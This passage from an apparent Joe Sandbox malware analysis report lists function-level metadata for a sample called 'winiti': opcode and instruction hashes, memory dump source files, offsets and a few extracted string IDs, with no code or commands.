                                                              • Instruction ID: 4ecbbcb4d62585c475c7677e93b110379c984b429c77fa9985a410ca5e263068
                                                              • Opcode Fuzzy Hash: 936fbd3308605e5f0c8b8666958410499d763bb8300bece1bd9ff51529661795
                                                              • Instruction Fuzzy Hash: 2D01AF317001295BEB65967DA894B2F73DAEBD9B20F14883EF60BC7344EE29DC424395
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9745fc7d7116d3e9fd7aad2d6ff000f7cb1ff30a7373847a93c78803cce527ca
                                                              • Instruction ID: 9eb3403a7f6ad95cb84c382a746aa26618097bf734f3a0a92cfca50d8d3df897
                                                              • Opcode Fuzzy Hash: 9745fc7d7116d3e9fd7aad2d6ff000f7cb1ff30a7373847a93c78803cce527ca
                                                              • Instruction Fuzzy Hash: 1C0131347002245BDB24E678F954B2A73DAEB96714F108828F51ACB384DF36DC418784
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 499af4224c0fb98e91c7287df737222f170373fa86b244ad41fba4e0e5ca8c0f
                                                              • Instruction ID: 9a7599edc261823a456e56f87bc95d7d1ad3e54baf682b1e5ffcbafa652172df
                                                              • Opcode Fuzzy Hash: 499af4224c0fb98e91c7287df737222f170373fa86b244ad41fba4e0e5ca8c0f
                                                              • Instruction Fuzzy Hash: FE018C30B005298BDF44DA99F5447ADF3B3FFA4320FA58061D908EB241D738ED908B80
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26d12574ccf782d1fb6cbea261c63f37d40992853540f9ce4425b611eb9f3d99
                                                              • Instruction ID: 496a7910ed0fe69d37195cea183d6e1033f52df0e91465b87b0fd15a39eb5404
                                                              • Opcode Fuzzy Hash: 26d12574ccf782d1fb6cbea261c63f37d40992853540f9ce4425b611eb9f3d99
                                                              • Instruction Fuzzy Hash: DE01DF30500388AFCB46FBB4F4866AC7BB0EF40300B5089A9D5049B159EF31AF0A8B81
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 11716b87fe79979042d8309928c542b4df420d8fd1be5b873a7e11e4543d2ff6
                                                              • Instruction ID: f9ab670569f866bd10a68240e6e615ed035ca1a2c86fe103afe179ae4caeb19e
                                                              • Opcode Fuzzy Hash: 11716b87fe79979042d8309928c542b4df420d8fd1be5b873a7e11e4543d2ff6
                                                              • Instruction Fuzzy Hash: 3BF08C35B001189BDB00DBA8EC50BDEB7F1EBC8322F1482A5E519A7394C634DA118BA4
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 766fd89495117529565c8d99f72d202edb8d364423a9c773f71d1c987456645d
                                                              • Instruction ID: 284ed2a09bab7268b660d01af772563e117b2b516cf476c09e8262ff44b06713
                                                              • Opcode Fuzzy Hash: 766fd89495117529565c8d99f72d202edb8d364423a9c773f71d1c987456645d
                                                              • Instruction Fuzzy Hash: CE012839B00618CFDB14DB78D95CBAC37B2EF89715F1440A9E5068B3A4CB71AD82CB40
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714036158.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2d0000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9accdc27f433c0cc31d6f0232a923acf9a8ed6521d0cec41a4467250f3b4586f
                                                              • Instruction ID: 42876f5b6bdc96f1d666a368de977d15d36cc8ff1759b4fffcf04fd8d2e4d71e
                                                              • Opcode Fuzzy Hash: 9accdc27f433c0cc31d6f0232a923acf9a8ed6521d0cec41a4467250f3b4586f
                                                              • Instruction Fuzzy Hash: 58F0317091034DAFCB45FBA4F58669D77B5EF44304B908968D50597259DF31AF098B80
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 12b54da6784363888d88036fb6ac0432a644d869c4fd80ba710600600290622e
                                                              • Instruction ID: 40d640980685324c1ff7c4254848841d2506a4e741fb6419b8df828d6222b34a
                                                              • Opcode Fuzzy Hash: 12b54da6784363888d88036fb6ac0432a644d869c4fd80ba710600600290622e
                                                              • Instruction Fuzzy Hash: B1F0A032B2123897CB146965F804A9AB37AEB85760F10442AED05A7344EB75AD108BD0
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d2be532cbcca0035191f43e1f071a628f670781cf751e368e5910769ad8a3ea
                                                              • Instruction ID: 303be4f33e0b49b68b8d1cd14b6588e5537aa99726b59bbe616e67ea261e8dd7
                                                              • Opcode Fuzzy Hash: 6d2be532cbcca0035191f43e1f071a628f670781cf751e368e5910769ad8a3ea
                                                              • Instruction Fuzzy Hash: F7F08C71E1022A9FCB91DFB898051EE7BF4FB89310B01847AE809E2200E2358A118B82
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 219a94a5e52064a46f46c1163d4ea848916ba083a98692dbdfdbe2db8d3a106a
                                                              • Instruction ID: c6cf125f84c768e3cd10f36fcd1231d2b407e9a5d7bac8100178b77f571b544b
                                                              • Opcode Fuzzy Hash: 219a94a5e52064a46f46c1163d4ea848916ba083a98692dbdfdbe2db8d3a106a
                                                              • Instruction Fuzzy Hash: B9E026382143284FEB626B38F48A2697BE4EF03320F184876E405C7281C32ADC418B12
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: feb055d011af5281fc083f6f3c5e4cff31196403e409be120b2e1f5ac49486fe
                                                              • Instruction ID: ff1926753df97f48c74cbc76caa84102b1e097a14bfe10d7c75db14774b56513
                                                              • Opcode Fuzzy Hash: feb055d011af5281fc083f6f3c5e4cff31196403e409be120b2e1f5ac49486fe
                                                              • Instruction Fuzzy Hash: 41E04871D00125AF8F50DF7958042AE77F9FB45350F108476DD09E3200F634CA118BD2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ce3b1bd76dfd4d0689c13b7c3d11c5454039d1ac144a04ac443751b6ab8894b
                                                              • Instruction ID: 404ac61bcd4e0d484def61ee33fb009bd80c017f0f155dc7ce49f9fa80134599
                                                              • Opcode Fuzzy Hash: 5ce3b1bd76dfd4d0689c13b7c3d11c5454039d1ac144a04ac443751b6ab8894b
                                                              • Instruction Fuzzy Hash: FAE02B32B40135CB1E117294B4611FD7356F7E83643208563E606C7309DF36DD2247C1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f6b72a3ad50cf0f30504d0843f5d49e1600a85dc9365aba75cfac8bd09342863
                                                              • Instruction ID: d0f505c3087d1fa06df42746c0ac25a88745e48f83e56664c6fa98d83fbf1d47
                                                              • Opcode Fuzzy Hash: f6b72a3ad50cf0f30504d0843f5d49e1600a85dc9365aba75cfac8bd09342863
                                                              • Instruction Fuzzy Hash: 87E0C231B002329B4A107298B4900EC7351E7883287108976E605C7306DA7ACD1207C2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9814a50ba40bddadcb53dff3129dffe5f6fa22e86896d10596eda7c56de80950
                                                              • Instruction ID: 363b11e3dfd71c61e2f93902536737eba2c1f05d3e7ebc9789a3de9d43045b1e
                                                              • Opcode Fuzzy Hash: 9814a50ba40bddadcb53dff3129dffe5f6fa22e86896d10596eda7c56de80950
                                                              • Instruction Fuzzy Hash: A8D05E36B002088FDF005BB8FD0D09CB7A1FB84311B00402AE90687650CB320A518B40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $p$$p$$p$$p$$p$$p$$p$$p$$p$$p
                                                              • API String ID: 0-1868313790
                                                              • Opcode ID: d7394ddffd764e9158cf75e3b8fb242b93cdcee77747aabfd980cf3b5d2bef69
                                                              • Instruction ID: b038aa09fdc2530513cb5332230deece1cbd9d8e1e99e9c4ce964a0148d56f3b
                                                              • Opcode Fuzzy Hash: d7394ddffd764e9158cf75e3b8fb242b93cdcee77747aabfd980cf3b5d2bef69
                                                              • Instruction Fuzzy Hash: 61124E30A01229DFDB28DF65D854BAEB7B2BF85300F60856AD409AB365DB35DD86CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $p$$p$$p$$p$$p$$p$$p$$p
                                                              • API String ID: 0-4214562277
                                                              • Opcode ID: 4d5f49a1dda19ca77cb3ea99d9411e19ac513ac595e774c338827ead8f864c8a
                                                              • Instruction ID: 1d80b3bba3828686c0979a71a49112796f0b2ae425b8fbc85d426548bd14cf52
                                                              • Opcode Fuzzy Hash: 4d5f49a1dda19ca77cb3ea99d9411e19ac513ac595e774c338827ead8f864c8a
                                                              • Instruction Fuzzy Hash: FE915F30A00315DFEB24EF64F989BAEBBB2BF84300F648429E41197294DB799D45CB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $p$$p$$p$$p$$p$$p$$p$$p
                                                              • API String ID: 0-4214562277
                                                              • Opcode ID: ab879f3e901971d61d3166597f4f76e30c50ee881d7370276d3730f370f376fd
                                                              • Instruction ID: b0119fc8d1c227d889625162c5eb00cfa70e269de27f54d98973470aa4785572
                                                              • Opcode Fuzzy Hash: ab879f3e901971d61d3166597f4f76e30c50ee881d7370276d3730f370f376fd
                                                              • Instruction Fuzzy Hash: B4518F30A11614DFCB29DB68F8846AEB7E2FF84310F64842AD815D7395DB39DC46CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $p$$p$$p$$p
                                                              • API String ID: 0-3121760203
                                                              • Opcode ID: 34158f7fb972481f1db424a29b5d3b8129df7813de55e9566425e89d20d0a528
                                                              • Instruction ID: ff41b3be644cb3da2aa0cacbc4ca895611ceddc3538968682e850decd71ef465
                                                              • Opcode Fuzzy Hash: 34158f7fb972481f1db424a29b5d3b8129df7813de55e9566425e89d20d0a528
                                                              • Instruction Fuzzy Hash: 0FB14E70A00215DFDB28EF68E5857AEBBB2EF84301F64C429D4059B356DB79DD86CB80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LRp$LRp$$p$$p
                                                              • API String ID: 0-727438728
                                                              • Opcode ID: f33578c3a05471f87b4097519590c8702986a0cc7ac2c8c7e5ffa57fe85e71ae
                                                              • Instruction ID: 4ad4ee7fc9c9c280a87412d4f7a2b8ce78e90279af42083dc7ba41363e2d5351
                                                              • Opcode Fuzzy Hash: f33578c3a05471f87b4097519590c8702986a0cc7ac2c8c7e5ffa57fe85e71ae
                                                              • Instruction Fuzzy Hash: 14518370700311AFCB18EF64E495A6E77E2FF89300F548969E4059B36ADB35ED46CB50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $p$$p$$p$$p
                                                              • API String ID: 0-3121760203
                                                              • Opcode ID: e51e58dbf884b8e9afdd6a919e9a281616ad64df01d563c07cf81cba37dc7654
                                                              • Instruction ID: f80594c5d6327bf1679c15f1db586568a21d7e7c47be8f1fd2caa03241afa40f
                                                              • Opcode Fuzzy Hash: e51e58dbf884b8e9afdd6a919e9a281616ad64df01d563c07cf81cba37dc7654
                                                              • Instruction Fuzzy Hash: 44517D30A11618DBCB25DB68F5846AEB7F2FF84310F64892AE805D7395DB39DC42CB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.714214607.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_720000_winiti.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $p$$p$$p$$p
                                                              • API String ID: 0-3121760203
                                                              • Opcode ID: f7da82ad57e671e339d5d17bb68d4a8b63b50cc6b9721221ef28bcc544c011c6
                                                              • Instruction ID: d199ed712113167a27ce69d0031b63fc4d3e3a7b5481320b498fc2cd704344ec
                                                              • Opcode Fuzzy Hash: f7da82ad57e671e339d5d17bb68d4a8b63b50cc6b9721221ef28bcc544c011c6
                                                              • Instruction Fuzzy Hash: 3B418C70A10614CBCF25EB68F58566D73E2FF88300B64842AE8169B399DB38DC46CB91